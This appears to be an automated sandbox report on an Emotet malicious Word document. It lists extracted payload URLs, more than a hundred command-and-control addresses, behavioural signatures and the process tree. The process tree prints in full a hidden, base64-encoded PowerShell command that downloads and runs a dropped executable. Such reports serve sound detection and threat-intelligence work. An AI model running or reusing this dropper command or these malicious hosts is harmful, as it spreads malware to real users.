Analysis
-
max time kernel
28s -
resource
win10v191014 -
submitted
27-01-2020 23:52
General
Malware Config
Extracted
http://covaihomes.com/cgi-bin/t3ln/
http://saxseafood.com/wp-content/VHTlLciKX/
https://zaamira.com/wp-admin/2sof7o/
https://shopify-ed.apps.zeroek.com/dist/hxrf9/
https://sophistproduction.com/wp-includes/Wijy9/
Extracted
emotet
207.177.72.129:8080
23.243.215.4:8080
218.255.173.106:80
136.243.205.112:7080
23.92.16.164:8080
45.55.65.123:8080
217.160.19.232:8080
64.66.6.71:8080
66.34.201.20:7080
85.152.174.56:80
202.175.121.202:8090
87.106.139.101:8080
176.9.43.37:8080
98.156.206.153:80
159.65.25.128:8080
70.184.9.39:8080
209.146.22.34:443
95.213.236.64:8080
98.30.113.161:80
59.103.164.174:80
68.172.243.146:80
169.239.182.217:8080
206.189.112.148:8080
87.230.19.21:8080
217.160.182.191:8080
87.106.136.232:8080
179.13.185.19:80
78.24.219.147:8080
78.142.114.69:80
149.202.153.252:8080
206.81.10.215:8080
47.156.70.145:80
222.144.13.169:80
190.55.181.54:443
101.187.197.33:443
200.116.145.225:443
88.249.120.205:80
100.6.23.40:80
76.104.80.47:80
105.247.123.133:8080
201.229.45.222:8080
91.205.215.66:443
78.101.70.199:443
74.130.83.133:80
87.81.51.125:80
62.138.26.28:8080
152.168.248.128:443
70.180.35.211:80
74.101.225.121:443
178.153.176.124:80
31.31.77.83:443
190.117.126.169:80
209.141.54.221:8080
24.164.79.147:8080
104.131.44.150:8080
105.27.155.182:80
64.53.242.181:8080
121.88.5.176:443
47.6.15.79:80
139.130.242.43:80
205.185.117.108:8080
211.192.153.224:80
101.187.134.207:8080
90.69.145.210:8080
45.33.49.124:443
108.191.2.72:80
37.187.72.193:8080
68.114.229.171:80
201.184.105.242:443
180.92.239.110:8080
91.73.197.90:80
47.6.15.79:443
190.114.244.182:443
223.197.185.60:80
24.94.237.248:80
47.153.183.211:80
178.237.139.83:8080
190.117.226.104:80
24.196.49.98:80
189.212.199.126:443
108.179.206.219:8080
78.186.5.109:443
190.12.119.180:443
85.105.205.77:8080
181.126.70.117:80
120.150.246.241:80
108.6.140.26:80
93.147.141.5:443
195.244.215.206:80
95.128.43.213:8080
31.172.240.91:8080
72.189.57.105:80
182.176.132.213:8090
190.53.135.159:21
76.104.80.47:443
42.200.226.58:80
5.196.74.210:8080
188.0.135.237:80
103.86.49.11:8080
62.75.187.192:8080
60.250.78.22:443
64.40.250.5:80
62.75.141.82:80
186.86.247.171:443
115.65.111.148:443
60.231.217.199:8080
190.146.205.227:8080
46.105.131.87:80
209.97.168.52:8080
74.108.124.180:80
181.143.126.170:80
200.21.90.5:443
173.21.26.90:80
73.11.153.178:8080
92.222.216.44:8080
101.100.137.135:80
110.36.217.66:8080
24.105.202.216:443
78.189.180.107:80
181.57.193.13:80
101.187.237.217:80
181.13.24.82:80
178.20.74.212:80
75.114.235.105:80
160.16.215.66:8080
37.139.21.175:8080
50.116.86.205:8080
Signatures
-
Executes dropped EXE 2 IoCs
Processes:
881.exe881.exepid process 4580 881.exe 4684 881.exe -
Suspicious behavior: EmotetMutantsSpam 1 IoCs
Processes:
881.exepid process 4684 881.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
WINWORD.EXE881.exe881.exepid process 4916 WINWORD.EXE 4580 881.exe 4684 881.exe -
Process spawned unexpected child process 1 IoCs
Processes:
Powershell.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4456 372 Powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
Powershell.exepid process 4456 Powershell.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 4916 WINWORD.EXE -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
Powershell.exedescription pid process Token: SeDebugPrivilege 4456 Powershell.exe -
Suspicious use of WriteProcessMemory 2 IoCs
Processes:
Powershell.exe881.exedescription pid process target process PID 4456 wrote to memory of 4580 4456 Powershell.exe 881.exe PID 4580 wrote to memory of 4684 4580 881.exe 881.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\0b3bc0f390b0143250ba41db91cd8177d828756fd7c8a1bf5021b4a0bb30b1bc.doc" /o ""1⤵
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Checks processor information in registry
- Suspicious behavior: AddClipboardFormatListener
PID:4916
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exePowershell -w hidden -en JABQAHAAZgBnAGkAbgBkAHcAaABtAHcAPQAnAEIAbgBsAHcAYwBkAGQAcwBmAHUAJwA7ACQAWAB4AGgAawB0AHIAZgB1AHgAcQBiACAAPQAgACcAOAA4ADEAJwA7ACQARwB2AG0AbQBkAGQAZwB6AGQAbQB6AGIAegA9ACcAUgBwAGwAawB4AGgAcAByAGkAYQAnADsAJABUAGUAdABxAHMAYwBmAGkAaABjAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABYAHgAaABrAHQAcgBmAHUAeABxAGIAKwAnAC4AZQB4AGUAJwA7ACQASgB5AGoAdgBpAGsAagBoAGkAawB2AGoAcwA9ACcAWQBiAGwAdgBkAG8AcQBhAHAAagAnADsAJABIAGgAeAByAGkAawBtAGEAPQAuACgAJwBuACcAKwAnAGUAJwArACcAdwAtAG8AYgBqAGUAYwB0ACcAKQAgAE4ARQBUAC4AdwBlAGIAQwBMAGkARQBOAHQAOwAkAEQAcgBnAGIAZwBjAHUAcQBxAD0AJwBoAHQAdABwADoALwAvAGMAbwB2AGEAaQBoAG8AbQBlAHMALgBjAG8AbQAvAGMAZwBpAC0AYgBpAG4ALwB0ADMAbABuAC8AKgBoAHQAdABwADoALwAvAHMAYQB4AHMAZQBhAGYAbwBvAGQALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBWAEgAVABsAEwAYwBpAEsAWAAvACoAaAB0AHQAcABzADoALwAvAHoAYQBhAG0AaQByAGEALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvADIAcwBvAGYANwBvAC8AKgBoAHQAdABwAHMAOgAvAC8AcwBoAG8AcABpAGYAeQAtAGUAZAAuAGEAcABwAHMALgB6AGUAcgBvAGUAawAuAGMAbwBtAC8AZABpAHMAdAAvAGgAeAByAGYAOQAvACoAaAB0AHQAcABzADoALwAvAHMAbwBwAGgAaQBzAHQAcAByAG8AZAB1AGMAdABpAG8AbgAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AVwBpAGoAeQA5AC8AJwAuACIAcwBgAHAATABJAHQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABRAHEAZABkAGwAcABmAHcAYgB0AHIAcgByAD0AJwBFAGcAdQBiAHIAcgB3AHIAcQAnADsAZgBvAHIAZQBhAGMAaAAoACQARgB1AGcAYwBzAGUAZwBzAHgAYgAgAGkAbgAgACQARAByAGcAYgBnAGMAdQBxAHEAKQB7AHQAcgB5AHsAJABIAGgAeAByAGkAawBtAGEALgAiAEQATwBgAFcATgBMAE8AYQBgAEQAZgBpAEwARQAiACgAJABGAHUAZwBjAHMAZQBnAHMAeABiACwAIAAkAFQAZQB0AHEAcwBjAGYAaQBoAGMAKQA7ACQASwBrAHMAeAB0AG0AdwBtAHMAPQAnAEgAagB1AG4AagBrAGUAawB1ACcAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQAnACsAJwBJACcAKwAnAHQAZQBtACcAKQAgACQAVABlAHQAcQBzAGMAZgBpAGgAYwApAC4AIgBMAGUAbgBHAGAAVABIACIAIAAtAGcAZQAgADIAMwAwADUAMQApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBzAFQAYQBgAFIAdAAiACgAJABUAGUAdABxAHMAYwBmAGkAaABjACkAOwAkAE0AdQB2AGgAdQBoAHUAeQBtAD0AJwBFAHYAZABkAHoAZQB1AGYAeAAnADsAYgByAGUAYQBrADsAJABaAGsAaABlAGgAbABtAGcAPQAnAFcAZABnAGQAeQBlAGMAZQAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABSAGMAZABwAHMAZwBnAGUAZgBhAHkAcQA9ACcAVQBsAHoAcAB6AGkAbQBnAGMAZAAnAA==1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4456 -
C:\Users\Admin\881.exe"C:\Users\Admin\881.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4580 -
C:\Users\Admin\881.exe--bf0d2c8f3⤵
- Executes dropped EXE
- Suspicious behavior: EmotetMutantsSpam
- Suspicious use of SetWindowsHookEx
PID:4684
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\881.exe
-
C:\Users\Admin\881.exe
-
C:\Users\Admin\881.exe
-
memory/4580-8-0x00000000021C0000-0x00000000021D5000-memory.dmpFilesize
84KB
-
memory/4684-10-0x00000000005F0000-0x0000000000605000-memory.dmpFilesize
84KB
-
memory/4684-11-0x0000000000400000-0x0000000000463000-memory.dmpFilesize
396KB